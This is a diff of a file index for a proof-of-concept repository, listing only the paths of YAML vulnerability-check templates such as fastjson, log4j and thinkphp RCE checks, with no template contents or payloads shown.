./poc/remote_code_execution/fastjson-1-2-24-rce-7400.yaml -./poc/remote_code_execution/fastjson-1-2-24-rce.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7401.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7403.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7404.yaml +./poc/remote_code_execution/fastjson-1-2-41-rce.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7405.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7407.yaml -./poc/remote_code_execution/fastjson-1-2-42-rce.yaml +./poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml ./poc/remote_code_execution/fastjson-1-2-43-rce-7409.yaml ./poc/remote_code_execution/fastjson-1-2-43-rce-7411.yaml +./poc/remote_code_execution/fastjson-1-2-43-rce-7412.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7413.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7415.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7416.yaml ./poc/remote_code_execution/fastjson-1-2-62-rce-7417.yaml +./poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml ./poc/remote_code_execution/fastjson-1-2-62-rce-7420.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce-7421.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce-7423.yaml @@ -83936,7 +83916,6 @@ ./poc/remote_code_execution/icewarp-webclient-rce-8130.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8131.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8132.yaml -./poc/remote_code_execution/icewarp-webclient-rce-8133.yaml ./poc/remote_code_execution/image-source-control-isc-1f038aef0dcbd62c1999c43ff0e6ea69.yaml ./poc/remote_code_execution/image-source-control-isc-1f88dbd2b9c2d6237e296e8c6c1659c5.yaml ./poc/remote_code_execution/image-source-control-isc.yaml @@ -83959,7 +83938,7 @@ ./poc/remote_code_execution/jamf-log4j-jndi-rce-8211.yaml ./poc/remote_code_execution/jamf-log4j-jndi-rce-8212.yaml ./poc/remote_code_execution/jamf-log4j-jndi-rce-8213.yaml -./poc/remote_code_execution/jamf-log4j-jndi-rce.yaml +./poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml ./poc/remote_code_execution/jazzcash-woocommerce-gateway-2b946216639ed77b4eb9e56a3219058b.yaml ./poc/remote_code_execution/jazzcash-woocommerce-gateway.yaml ./poc/remote_code_execution/jeewms-dynamicDataSourceController-rce.yaml @@ -84054,8 +84033,8 @@ ./poc/remote_code_execution/lotapp-rce.yaml ./poc/remote_code_execution/lotuscms-rce-1.yaml ./poc/remote_code_execution/lotuscms-rce-2.yaml -./poc/remote_code_execution/lotuscms-rce-8650.yaml ./poc/remote_code_execution/lotuscms-rce-8651.yaml +./poc/remote_code_execution/lotuscms-rce-8652.yaml ./poc/remote_code_execution/lotuscms-rce-8653.yaml ./poc/remote_code_execution/maccms-rce.yaml ./poc/remote_code_execution/maccms-rce.yml @@ -84082,6 +84061,7 @@ ./poc/remote_code_execution/metersphere-plugin-rce-8835.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8836.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8837.yaml +./poc/remote_code_execution/metersphere-plugin-rce.yaml ./poc/remote_code_execution/mgb-opensource-guestbook.yaml ./poc/remote_code_execution/microblogrce.yaml ./poc/remote_code_execution/min-and-max-purchase-for-woocommerce-29c59921f159dd1fd640d027a39c2496.yaml @@ -84092,7 +84072,6 @@ ./poc/remote_code_execution/minmax-quantity-for-woocommerce.yaml ./poc/remote_code_execution/mirai-unknown-rce-8897.yaml ./poc/remote_code_execution/mirai-unknown-rce-8898.yaml -./poc/remote_code_execution/mirai-unknown-rce-8899.yaml ./poc/remote_code_execution/mobile-login-woocommerce-23d0bf81c74275c3e55e25a6c8aa8e5b.yaml ./poc/remote_code_execution/mobile-login-woocommerce-71c68dc9d2433d718771a35db7cc14f9.yaml ./poc/remote_code_execution/mobile-login-woocommerce-776ff600825d9dc7d0f61014766c27a4.yaml @@ -84183,7 +84162,6 @@ ./poc/remote_code_execution/ns-woocommerce-watermark-f2c10bb888c008fbd876fd44d534b759.yaml ./poc/remote_code_execution/ns-woocommerce-watermark.yaml ./poc/remote_code_execution/nsfocus-sas-rce-exec.yaml -./poc/remote_code_execution/nuuo-nvrmini2-rce-9170.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9172.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9173.yaml @@ -84199,6 +84177,7 @@ ./poc/remote_code_execution/opentsdb-rce-2.yaml ./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9341.yaml ./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9342.yaml +./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml ./poc/remote_code_execution/oracle-commerce-cloud.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-cb43a3033745f9235059b7d1b7a3d855.yaml @@ -84238,6 +84217,7 @@ ./poc/remote_code_execution/out-of-stock-display-for-woocommerce.yaml ./poc/remote_code_execution/pagination-styler-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml ./poc/remote_code_execution/pagination-styler-for-woocommerce.yaml +./poc/remote_code_execution/panabit-sy_addmount-rce.yaml ./poc/remote_code_execution/pandorafms-cve-2019-20224-rce.yml ./poc/remote_code_execution/parcel-tracker-ecourier-102353dc8e1f02661d6e7f970ee16c34.yaml ./poc/remote_code_execution/parcel-tracker-ecourier-1fbda1a354e4e1e6f5f905808cc4736f.yaml @@ -84278,8 +84258,8 @@ ./poc/remote_code_execution/pbootcms-v3.1.2-rce.yaml ./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce-9d530be5fa0db61096efe68f160be112.yaml ./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce.yaml +./poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce-9471.yaml -./poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce.yaml ./poc/remote_code_execution/perfect-woocommerce-brands-7f5741480217fb4df85d3b4de3f502cb.yaml ./poc/remote_code_execution/perfect-woocommerce-brands-e32d6103a8131017699f2d0178c74f2a.yaml @@ -84298,9 +84278,8 @@ ./poc/remote_code_execution/personalize-woocommerce-cart-page.yaml ./poc/remote_code_execution/pgsql-extensions-rce.yaml ./poc/remote_code_execution/phalcon-framework-source-9493.yaml +./poc/remote_code_execution/phalcon-framework-source-9494.yaml ./poc/remote_code_execution/phalcon-framework-source-9495.yaml -./poc/remote_code_execution/phalcon-framework-source-9496.yaml -./poc/remote_code_execution/phalcon-framework-source.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-5f600e44d5a9bae2880bbdac987c18c0.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-754324d17136d5a0b95bd48018ce3ad6.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-a18b8eeee685e84b7ab5bc1637d15598.yaml @@ -84310,11 +84289,10 @@ ./poc/remote_code_execution/phone-orders-for-woocommerce-plugin.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce.yaml ./poc/remote_code_execution/php-8.1.0-dev-rce-sqli.yaml -./poc/remote_code_execution/php-zerodium-backdoor-rce-9569.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9570.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9571.yaml +./poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9573.yaml -./poc/remote_code_execution/php-zerodium-backdoor-rce.yaml ./poc/remote_code_execution/phprce.yaml ./poc/remote_code_execution/phpstudy-backdoor-rce.yaml ./poc/remote_code_execution/phpstudy-backdoor-rce.yml @@ -84332,8 +84310,10 @@ ./poc/remote_code_execution/portugal-ctt-tracking-woocommerce.yaml ./poc/remote_code_execution/powercreator-cms-rce-9643.yaml ./poc/remote_code_execution/powercreator-cms-rce-9644.yaml +./poc/remote_code_execution/powercreator-cms-rce-9645.yaml ./poc/remote_code_execution/powercreator-cms-rce-9646.yaml ./poc/remote_code_execution/powercreator-cms-rce-9647.yaml +./poc/remote_code_execution/powercreator-cms-rce.yaml ./poc/remote_code_execution/pre-orders-for-woocommerce-687db182b0c9655d84523f55416267f1.yaml ./poc/remote_code_execution/pre-orders-for-woocommerce.yaml ./poc/remote_code_execution/premmerce-05c315c45c3d1e8458984521e6889db5.yaml @@ -84476,8 +84456,10 @@ ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9755.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9756.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9757.yaml +./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9758.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9759.yaml ./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9760.yaml +./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml ./poc/remote_code_execution/qianxin-secgate3600-syshandupfile-upload-rce.yaml ./poc/remote_code_execution/qilin-bastion-host-rce.yaml ./poc/remote_code_execution/qilin-bastion-host-rce.yml @@ -84583,7 +84565,6 @@ ./poc/remote_code_execution/salesforce-aura-9984.yaml ./poc/remote_code_execution/salesforce-aura-detect.yml ./poc/remote_code_execution/salesforce-aura-misconfig.yaml -./poc/remote_code_execution/salesforce-aura.yaml ./poc/remote_code_execution/salesforce-credentials-detect.yml ./poc/remote_code_execution/salesforce-login.yaml ./poc/remote_code_execution/salesforce-misconfiguration.yaml @@ -84605,6 +84586,7 @@ ./poc/remote_code_execution/sangfor-ad-login-rce.yaml ./poc/remote_code_execution/sangfor-ad-rce.yaml ./poc/remote_code_execution/sangfor-ba-rce(1).yaml +./poc/remote_code_execution/sangfor-ba-rce-10020.yaml ./poc/remote_code_execution/sangfor-ba-rce-10021.yaml ./poc/remote_code_execution/sangfor-ba-rce.yml ./poc/remote_code_execution/sangfor-cphp-rce.yaml @@ -84634,6 +84616,7 @@ ./poc/remote_code_execution/seacms-before-v992-rce.yaml ./poc/remote_code_execution/seacms-before-v992-rce.yml ./poc/remote_code_execution/seacms-rce-10100.yaml +./poc/remote_code_execution/seacms-rce-10101.yaml ./poc/remote_code_execution/seacms-rce-10102.yaml ./poc/remote_code_execution/seacms-rce.yml ./poc/remote_code_execution/seacms-v654-rce.yaml @@ -84668,6 +84651,7 @@ ./poc/remote_code_execution/shop-as-a-customer-for-woocommerce.yaml ./poc/remote_code_execution/showdoc-file-upload-rce-10225.yaml ./poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml +./poc/remote_code_execution/showdoc-file-upload-rce-10227.yaml ./poc/remote_code_execution/showdoc-file-upload-rce-10228.yaml ./poc/remote_code_execution/showdoc-file-upload-rce.yaml ./poc/remote_code_execution/side-cart-woocommerce-2b1e94ad1063793b918ab053345de198.yaml @@ -84676,7 +84660,7 @@ ./poc/remote_code_execution/side-cart-woocommerce.yaml ./poc/remote_code_execution/simple-e-commerce-shopping-cart-7e2981ed79fe5531ebd17112083654eb.yaml ./poc/remote_code_execution/simple-e-commerce-shopping-cart.yaml -./poc/remote_code_execution/simple-employee-rce-10280.yaml +./poc/remote_code_execution/simple-employee-rce-10279.yaml ./poc/remote_code_execution/simple-employee-rce.yaml ./poc/remote_code_execution/simple-woocommerce-csv-loader-ad18054d9efe7d6c6e0c45866e8bcf30.yaml ./poc/remote_code_execution/simple-woocommerce-csv-loader.yaml @@ -84722,14 +84706,15 @@ ./poc/remote_code_execution/splash-popup-for-woocommerce.yaml ./poc/remote_code_execution/spon-ip-intercom-ping-rce.yaml ./poc/remote_code_execution/spon-ip-intercom-ping-rce.yml -./poc/remote_code_execution/spon-ip-rce.yaml +./poc/remote_code_execution/spon-ip-rce(1).yaml +./poc/remote_code_execution/sponip-network-system-ping-rce-10421.yaml ./poc/remote_code_execution/sponip-network-system-ping-rce-10422.yaml ./poc/remote_code_execution/sponip-network-system-ping-rce-10423.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10454.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10455.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10456.yaml -./poc/remote_code_execution/springboot-h2-db-rce-10457.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10458.yaml +./poc/remote_code_execution/springboot-h2-db-rce.yaml ./poc/remote_code_execution/springboot-log4j-rce-10472.yaml ./poc/remote_code_execution/springboot-log4j-rce-10473.yaml ./poc/remote_code_execution/springboot-log4j-rce-10474.yaml @@ -84809,7 +84794,6 @@ ./poc/remote_code_execution/tamronos-iptv-rce.yml ./poc/remote_code_execution/tamronos-rce-10647.yaml ./poc/remote_code_execution/tamronos-rce-10648.yaml -./poc/remote_code_execution/tamronos-rce-10649.yaml ./poc/remote_code_execution/tamronos-rce-10650.yaml ./poc/remote_code_execution/tamronos-rce-10651.yaml ./poc/remote_code_execution/terms-and-conditions-popup-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml @@ -84824,18 +84808,17 @@ ./poc/remote_code_execution/thinkcmf-rce.yaml ./poc/remote_code_execution/thinkphp-2-rce-10738.yaml ./poc/remote_code_execution/thinkphp-2-rce-10739.yaml -./poc/remote_code_execution/thinkphp-2-rce-10740.yaml ./poc/remote_code_execution/thinkphp-2-rce-10741.yaml ./poc/remote_code_execution/thinkphp-30-rce.yaml ./poc/remote_code_execution/thinkphp-50-rce.yaml ./poc/remote_code_execution/thinkphp-501-rce-10742.yaml -./poc/remote_code_execution/thinkphp-501-rce-10743.yaml +./poc/remote_code_execution/thinkphp-501-rce.yaml ./poc/remote_code_execution/thinkphp-5010-rce.yaml ./poc/remote_code_execution/thinkphp-5022-5129-rce.yaml +./poc/remote_code_execution/thinkphp-5022-rce-10744.yaml ./poc/remote_code_execution/thinkphp-5022-rce-10745.yaml ./poc/remote_code_execution/thinkphp-5022-rce-10746.yaml -./poc/remote_code_execution/thinkphp-5022-rce.yaml -./poc/remote_code_execution/thinkphp-5023-rce-10748.yaml +./poc/remote_code_execution/thinkphp-5022-rce-10747.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10749.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10750.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10751.yaml @@ -84905,12 +84888,13 @@ ./poc/remote_code_execution/users-customers-import-export-for-wp-woocommerce.yaml ./poc/remote_code_execution/vcenter-rce.yaml ./poc/remote_code_execution/vercel-detect.yaml -./poc/remote_code_execution/vercel-takeover-11001.yaml +./poc/remote_code_execution/vercel-takeover-11000.yaml ./poc/remote_code_execution/vercel-takeover.yaml ./poc/remote_code_execution/visual-tools-dvr-rce-11031.yaml ./poc/remote_code_execution/visual-tools-dvr-rce-11032.yaml ./poc/remote_code_execution/visual-tools-dvr-rce.yaml ./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce-11034.yaml +./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce.yaml ./poc/remote_code_execution/vmware-horizon-log4j-rce.yaml ./poc/remote_code_execution/vmware-vcenter-cve-2021-21985-rce.yml ./poc/remote_code_execution/vmware-vcenter-log4j-jndi-rce-11050.yaml @@ -84946,10 +84930,10 @@ ./poc/remote_code_execution/webappick-product-feed-for-woocommerce.yaml ./poc/remote_code_execution/webmin-cve-2019-15107-rce.yml ./poc/remote_code_execution/webpack-sourcemap.yaml -./poc/remote_code_execution/webui-rce-11170.yaml ./poc/remote_code_execution/webui-rce-11171.yaml ./poc/remote_code_execution/webui-rce-11172.yaml ./poc/remote_code_execution/webui-rce-11173.yaml +./poc/remote_code_execution/webui-rce-11174.yaml ./poc/remote_code_execution/webui-rce.yaml ./poc/remote_code_execution/weight-based-shipping-for-woocommerce-03810ee843c54e70aa66a159f989ab60.yaml ./poc/remote_code_execution/weight-based-shipping-for-woocommerce.yaml @@ -85710,13 +85694,12 @@ ./poc/remote_code_execution/wordpress-rce-simplefilelist.yaml ./poc/remote_code_execution/wordpress-simplefilelist-rce.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11338.yaml -./poc/remote_code_execution/wordpress-woocommerce-listing-11339.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11340.yaml +./poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-1.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11342.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11343.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11344.yaml -./poc/remote_code_execution/wordpress-woocommerce-sqli-11345.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-2.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli.yaml ./poc/remote_code_execution/wordpress-xmlrpc-brute-force.yaml @@ -85773,6 +85756,7 @@ ./poc/remote_code_execution/wp-ecommerce-shop-styling.yaml ./poc/remote_code_execution/wp-force-ssl-535af98dd21b180aed9353b26ab61bf4.yaml ./poc/remote_code_execution/wp-force-ssl-8016151e9aade43a962c06ab9c46dfaf.yaml +./poc/remote_code_execution/wp-force-ssl.yaml ./poc/remote_code_execution/wp-graphql-woocommerce-5e48b1d9464c6954c7f09642fd0e35aa.yaml ./poc/remote_code_execution/wp-graphql-woocommerce.yaml ./poc/remote_code_execution/wp-hubspot-woocommerce-5ea745cbaec9e5a0599bde7b2e42faf2.yaml @@ -85796,8 +85780,8 @@ ./poc/remote_code_execution/wp-woocommerce-email-verification-11618.yaml ./poc/remote_code_execution/wp-woocommerce-email-verification-11619.yaml ./poc/remote_code_execution/wp-woocommerce-email-verification-2.yaml +./poc/remote_code_execution/wp-woocommerce-file-download-11620.yaml ./poc/remote_code_execution/wp-woocommerce-file-download-11621.yaml -./poc/remote_code_execution/wp-woocommerce-file-download.yaml ./poc/remote_code_execution/wp-woocommerce-pdf-invoice-listing-11622.yaml ./poc/remote_code_execution/wp-woocommerce-quickbooks-24e0b26c242968cb290b2a8bf1d68029.yaml ./poc/remote_code_execution/wp-woocommerce-quickbooks-95df688c610b5a94c1c10c8d8b9ac0d6.yaml @@ -85813,6 +85797,7 @@ ./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml ./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce.yaml ./poc/remote_code_execution/yapi-rce-11724.yaml +./poc/remote_code_execution/yapi-rce-11725.yaml ./poc/remote_code_execution/yapi-rce-11726.yaml ./poc/remote_code_execution/yapi-rce.yml ./poc/remote_code_execution/yarn-resourcemanager-rce-11734.yaml @@ -86165,11 +86150,11 @@ ./poc/ruby/rails-database-config-9803.yaml ./poc/ruby/rails-database-config-9804.yaml ./poc/ruby/rails-debug-mode-9805.yaml -./poc/ruby/rails-debug-mode-9807.yaml +./poc/ruby/rails-debug-mode-9806.yaml ./poc/ruby/rails-debug-mode.yaml ./poc/ruby/rails-routes-exposed.yaml ./poc/ruby/rails-secret-token-disclosure-9808.yaml -./poc/ruby/rails-secret-token-disclosure-9809.yaml +./poc/ruby/rails-secret-token-disclosure-9810.yaml ./poc/ruby/rails-secret-token-disclosure.yaml ./poc/ruby/rails-secret-token.yaml ./poc/ruby/rails6-xss-9797.yaml @@ -86188,7 +86173,7 @@ ./poc/ruby/xss-rails-post.yaml ./poc/samba/samba-config-9985.yaml ./poc/samba/samba-config-9986.yaml -./poc/samba/samba-config-9987.yaml +./poc/samba/samba-config.yaml ./poc/samba/samba-detect-9988.yaml ./poc/samba/samba-detect-9990.yaml ./poc/samba/samba-detect.yaml @@ -86239,12 +86224,11 @@ ./poc/sap/sap-netweaver-detect-10043.yaml ./poc/sap/sap-netweaver-detect-10044.yaml ./poc/sap/sap-netweaver-detect-10046.yaml -./poc/sap/sap-netweaver-detect-10047.yaml ./poc/sap/sap-netweaver-detect-10048.yaml ./poc/sap/sap-netweaver-detect.yaml ./poc/sap/sap-netweaver-info-leak-10049.yaml ./poc/sap/sap-netweaver-info-leak-10050.yaml -./poc/sap/sap-netweaver-info-leak-10052.yaml +./poc/sap/sap-netweaver-info-leak-10051.yaml ./poc/sap/sap-netweaver-info-leak.yaml ./poc/sap/sap-netweaver-portal-10053.yaml ./poc/sap/sap-netweaver-portal-10054.yaml @@ -86253,7 +86237,6 @@ ./poc/sap/sap-netweaver-webgui-10056.yaml ./poc/sap/sap-netweaver-webgui-10057.yaml ./poc/sap/sap-netweaver-webgui-10059.yaml -./poc/sap/sap-netweaver-webgui.yaml ./poc/sap/sap-netweaver-workflow-10060.yaml ./poc/sap/sap-netweaver-workflow-10061.yaml ./poc/sap/sap-netweaver-workflow.yaml @@ -86262,13 +86245,11 @@ ./poc/sap/sap-nw-abap-webgui.yaml ./poc/sap/sap-nw-abap.yaml ./poc/sap/sap-recon-detect-10062.yaml -./poc/sap/sap-recon-detect-10063.yaml ./poc/sap/sap-recon-detect.yaml ./poc/sap/sap-redirect-10064.yaml ./poc/sap/sap-redirect-10065.yaml ./poc/sap/sap-redirect-10066.yaml ./poc/sap/sap-redirect-10067.yaml -./poc/sap/sap-redirect.yaml ./poc/sap/sap-router-info-leak.yaml ./poc/sap/sap-router.yaml ./poc/sap/sap-spartacus.yaml @@ -86281,11 +86262,12 @@ ./poc/sap/sap-web-dispatcher-10078.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10069.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10070.yaml +./poc/sap/sap-web-dispatcher-admin-portal-10071.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10072.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10073.yaml ./poc/sap/sap-web-dispatcher-admin-portal.yaml ./poc/sap/sapfiori-panel-1.yaml -./poc/sap/sapfiori-panel-10034.yaml +./poc/sap/sapfiori-panel-10033.yaml ./poc/sap/sapfiori-panel-2.yaml ./poc/sap/sapfiori-panel.yaml ./poc/sap/saphali-woocommerce-lite-f1a8989f3685644493e1506c7b69f933.yaml @@ -86401,7 +86383,7 @@ ./poc/search/ajax-search-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/search/ajax-search-pro-plugin.yaml ./poc/search/ajax-search-pro.yaml -./poc/search/aws-opensearch-login-650.yaml +./poc/search/aws-opensearch-login-649.yaml ./poc/search/aws-opensearch-login.yaml ./poc/search/axublog_v1-search-sqli.yaml ./poc/search/better-search-162a0d80b5d220d9e37c3f6ae9fddb60.yaml @@ -86507,6 +86489,7 @@ ./poc/search/elasticsearch-insecure-default-config.yaml ./poc/search/elasticsearch-log4j.yaml ./poc/search/elasticsearch-sql-client-detect-7189.yaml +./poc/search/elasticsearch-sql-client-detect-7190.yaml ./poc/search/elasticsearch-sql-client-detect-7191.yaml ./poc/search/elasticsearch-sql-client-detect-7192.yaml ./poc/search/elasticsearch-unauth.yaml @@ -86639,7 +86622,6 @@ ./poc/search/search-unleashed-43b47c7d41209b50fd68346a0295170e.yaml ./poc/search/search-unleashed.yaml ./poc/search/searchbar.yaml -./poc/search/searches.yaml ./poc/search/searchiq-486b2d79f520ba9226667882d1e0c61d.yaml ./poc/search/searchiq-5009d6ede19c15ff2d2f30c18e0f60b2.yaml ./poc/search/searchiq-5f115235a8b59c98637592fa393641f7.yaml @@ -86812,7 +86794,6 @@ ./poc/sensitive/sensitive-storage-exposure-4.yaml ./poc/sensitive/sensitive-storage-exposure-5.yaml ./poc/sensitive/sensitive-storage-exposure-6.yaml -./poc/sensitive/sensitive-storage-exposure.yaml ./poc/sensitive/sensitives.yaml ./poc/sensitive/typo3-sensitive-files.yaml ./poc/sensitive/wordpress-sensitive-config.yaml @@ -86821,14 +86802,13 @@ ./poc/sensitive/zenphoto-installation-sensitive-info-2.yaml ./poc/sensitive/zenphoto-installation-sensitive-info-3.yaml ./poc/sensitive/zenphoto-installation-sensitive-info-4.yaml -./poc/sensitive/zenphoto-installation-sensitive-info.yaml ./poc/sensitive/zenphoto-sensitive-info-1.yaml +./poc/sensitive/zenphoto-sensitive-info-11784.yaml ./poc/sensitive/zenphoto-sensitive-info-2.yaml ./poc/sensitive/zenphoto-sensitive-info-3.yaml ./poc/sensitive/zenphoto-sensitive-info-4.yaml ./poc/sensitive/zenphoto-sensitive-info.yaml ./poc/sharepoint/exposed-sharepoint-list-7344.yaml -./poc/sharepoint/exposed-sharepoint-list-7345.yaml ./poc/sharepoint/exposed-sharepoint-list-7346.yaml ./poc/sharepoint/exposed-sharepoint-list-7347.yaml ./poc/sharepoint/microsoft-sharepoint.yaml @@ -86841,17 +86821,15 @@ ./poc/shopify/import-shopify-to-woocommerce.yaml ./poc/shopify/seoking-shopify-app.yaml ./poc/shopify/shopify-app-installer.yaml -./poc/shopify/shopify-custom-token-10198.yaml +./poc/shopify/shopify-custom-token(1).yaml ./poc/shopify/shopify-custom-token-11860.yaml ./poc/shopify/shopify-custom-token.yaml ./poc/shopify/shopify-legacy-private-app-token.yaml ./poc/shopify/shopify-private-token-10199.yaml -./poc/shopify/shopify-private-token-11861.yaml ./poc/shopify/shopify-private-token.yaml ./poc/shopify/shopify-public-access.yaml ./poc/shopify/shopify-shared-secret-11862.yaml ./poc/shopify/shopify-shared-secret.yaml -./poc/shopify/shopify-takeover-10201.yaml ./poc/shopify/shopify-takeover-10202.yaml ./poc/shopify/shopify-takeover-10203.yaml ./poc/shopify/shopify-takeover-10204.yaml @@ -86879,7 +86857,7 @@ ./poc/smtp/easy-wp-smtp-e105c23e6058137711e2a12fec6f051e.yaml ./poc/smtp/easy-wp-smtp-listing-7154.yaml ./poc/smtp/easy-wp-smtp-listing-7155.yaml -./poc/smtp/easy-wp-smtp-listing-7157.yaml +./poc/smtp/easy-wp-smtp-listing-7156.yaml ./poc/smtp/easy-wp-smtp-listing.yaml ./poc/smtp/easy-wp-smtp.yaml ./poc/smtp/esmtp-detect.yaml @@ -86893,6 +86871,7 @@ ./poc/smtp/fluent-smtp-9cf8fafd63ba25b0026079b7736ef163.yaml ./poc/smtp/fluent-smtp.yaml ./poc/smtp/msmtp-config-8966.yaml +./poc/smtp/msmtp-config-8967.yaml ./poc/smtp/post-smtp-01bed4d8fc18f92e932ac3e1e0f4f5cb.yaml ./poc/smtp/post-smtp-1c60fa32acf2539fdc2944eaf19fbe1e.yaml ./poc/smtp/post-smtp-20b5a1223c8140b840ffff5422240c1d.yaml @@ -87258,7 +87237,6 @@ ./poc/social/facebook-phish.yaml ./poc/social/facebook-secret-7386.yaml ./poc/social/facebook-secret.yaml -./poc/social/facebook-secrets.yaml ./poc/social/facebook-wall-and-social-integration-739e4454fbb308c937ef75bb1786deff.yaml ./poc/social/facebook-wall-and-social-integration.yaml ./poc/social/facebook.yaml @@ -87312,7 +87290,7 @@ ./poc/social/floating-social-media-links-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/floating-social-media-links-plugin.yaml ./poc/social/floating-social-media-links.yaml -./poc/social/flow-flow-social-stream-xss.yaml +./poc/social/flow-flow-social-stream-xss-7524.yaml ./poc/social/flow-flow-social-streams-0b11cbe599572e7479985362c28e5bab.yaml ./poc/social/flow-flow-social-streams-b2ca9c85649f9ca0a5356ebbebb714ec.yaml ./poc/social/flow-flow-social-streams-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -87418,7 +87396,6 @@ ./poc/social/kiwi-social-share.yaml ./poc/social/lazy-facebook-comments-869b4c99b310f9132fffb57ed8a544a0.yaml ./poc/social/lazy-facebook-comments.yaml -./poc/social/linkedin-id-11853.yaml ./poc/social/linkedin-id.yaml ./poc/social/linkedin-phish.yaml ./poc/social/linkedin.yaml @@ -87504,10 +87481,10 @@ ./poc/social/rimons-twitter-widget-8b341a5853c74db00a81c6612967b88a.yaml ./poc/social/rimons-twitter-widget.yaml ./poc/social/sassy-social-share-054e10a9454bde60b36d0b76ce12b2f2.yaml +./poc/social/sassy-social-share-10083.yaml ./poc/social/sassy-social-share-10084.yaml ./poc/social/sassy-social-share-10085.yaml ./poc/social/sassy-social-share-10086.yaml -./poc/social/sassy-social-share-10087.yaml ./poc/social/sassy-social-share-380a93a6eb0678027b6e7c5b3db32454.yaml ./poc/social/sassy-social-share-5d7eeac9d47ec654e4d9145037a7ff62.yaml ./poc/social/sassy-social-share-5d9f6b221c4bba02420d23f606a1608b.yaml @@ -87521,6 +87498,7 @@ ./poc/social/sassy-social-share-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/sassy-social-share-plugin.yaml ./poc/social/sassy-social-share-xss.yaml +./poc/social/sassy-social-share.yaml ./poc/social/scriptless-social-sharing-e6bc780a169375a20634676d371e4d7b.yaml ./poc/social/scriptless-social-sharing.yaml ./poc/social/seed-social-2469f603fdf449edfed5d7210aa6c605.yaml @@ -87997,11 +87975,11 @@ ./poc/sql/74cms-show-sqli.yaml ./poc/sql/74cms-sqli-1.yaml ./poc/sql/74cms-sqli-1.yml -./poc/sql/74cms-sqli-10.yaml ./poc/sql/74cms-sqli-2.yaml ./poc/sql/74cms-sqli-2.yml ./poc/sql/74cms-sqli-8.yaml ./poc/sql/74cms-sqli-9.yaml +./poc/sql/74cms-sqli.yaml ./poc/sql/74cms-sqli.yml ./poc/sql/74cms_V3-plusa-sqli.yaml ./poc/sql/74cms_v4-register-sqli.yaml @@ -90128,8 +90106,8 @@ 